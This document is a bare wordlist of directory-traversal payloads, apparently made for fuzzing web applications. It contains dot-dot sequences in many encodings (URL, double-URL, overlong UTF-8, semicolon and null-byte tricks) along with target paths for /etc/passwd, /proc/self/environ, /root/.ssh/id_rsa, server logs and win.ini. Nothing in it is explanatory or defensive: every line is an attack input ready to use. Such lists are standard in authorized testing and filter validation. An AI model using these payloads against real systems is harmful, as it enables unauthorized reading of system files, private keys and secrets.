??../../
?..
?../..//
?/../
?/./../
.
.?.
.?./
.?./..//
..;?/../
..;/
..;/;/..;/
..;/;/../
..;/?../../
..;/..;/
..;/..;/?/
..;/..;/..;/
..;/..?/../
..;/../
..;/..%3f/../
..?
..??/../
..??//../
..?/../
..?/..//
......//////../
.....////../
...../////../
..../
..../?/
..../?/../
..../..../
....//
....//../
....///
....////../
.../.../
.../../
..././
../
../;?/
../;?/../
../;?#/
../;/../
../?../
../?/
../?/../
../../
../../../
../../../../
../../../../../
../../../../../../
../../../../../../../
../../../../../../../../
../../../../etc/passwd
../../../../proc/self/environ
../../../../proc/self/cmdline
../../../../proc/self/maps
../../../../proc/self/status
../../../../root/.ssh/id_rsa
../../../../var/log/auth.log
../../../../var/log/nginx/access.log
../../../../windows/win.ini
../../../etc/passwd
../../%00/
../../etc/passwd
.././../
../././../
..//
..//./../
..///
..///../
../%00/
../etc/passwd
..\ 
..\..\ 
..\..\..\ 
..\..\..\..\ 
..\..\..\..\windows\win.ini
..\..\.\etc\passwd
..\..\etc\passwd
..\etc\passwd
..%00/
..%09/
..%0a/
..%0d/
..%252f
..%252f;/../
..%252f?/../
..%252f..
..%252f..%252f
..%252f..%252f..%252f
..%252f..%252f..%252fproc/self/environ
..%252f..%252fetc/passwd
..%252f%252e%252e%252f
..%253f/../
..%255c?/..%255c
..%255c..%255cwindows\win.ini
..%2f
..%2f;/../
..%2f;%2f../
..%2f??/../
..%2f?/
..%2f?/../
..%2f..
..%2f../
..%2f..%2f
..%2f..%2f..%2f
..%2f..%2f..%2f..%2f
..%2f..%2f..%2fproc/self/environ
..%2f..%2fetc/passwd
..%2f%2e%2e%2f
..%3f../
..%3f..%252f
..%3f..%2f
..%3f/../
..%5c
..%5c?/
..%5c?/..%5c
..%5c..
..%5c..%5c
..%5c..%5c..%5c
..%5c..%5cwindows\win.ini
..%c0%af
..%c1%9c
..%ef%bc%8f
./
./.././../
.%2e/
.%2e/../
.%2e/.%2e/
.%2e/.%2e/.%2e/
.%2e%2f../
/;/
/.
/.;/
/.;/.;/../
/.;/../
/..?/
/..?/../
/..?//../
/.../../
/..%2f..%2f
/./
/.%2e/
/.%2e/?/
/.%2e/?/../
/.%2e/.%2e/
/.%2e/.%2e/.%2e/
//../
//..//
/\../
/%252e%252e?/
/%252e%252e/
/%252e%252e/?/../
/%252e%252e//%252e%252e/
/%252e%252e%252f
/%2e/
/%2e%2e?/
/%2e%2e/
/%2e%2e/?/../
/%2e%2e//%2e%2e/
/%2e%2e/%2e%2e/
/%2e%2e%2f
/%2f%2e%2e/
/%2f%2e%2e/%2f
\../
\..\
\\../
%252e%252e/
%252e%252e/%252e%252e/
%252e%252e%252f
%252e%252e%252f%252e%252e%252f
%255c%255c..%255c
%2e./../
%2e%2e./
%2e%2e./../
%2e%2e/
%2e%2e/%2e%2e/
%2e%2e/%2e%2e/%2e%2e/
%2e%2e%255c
%2e%2e%2f
%2e%2e%2f%2e%2e%2f
%2e%2e%2f%2e%2e%2f%2e%2e%2f
%2e%2e%5c
%c0%ae%c0%ae/
%c1%ae%c1%ae/
%ef%bc%8e%ef%bc%8e/
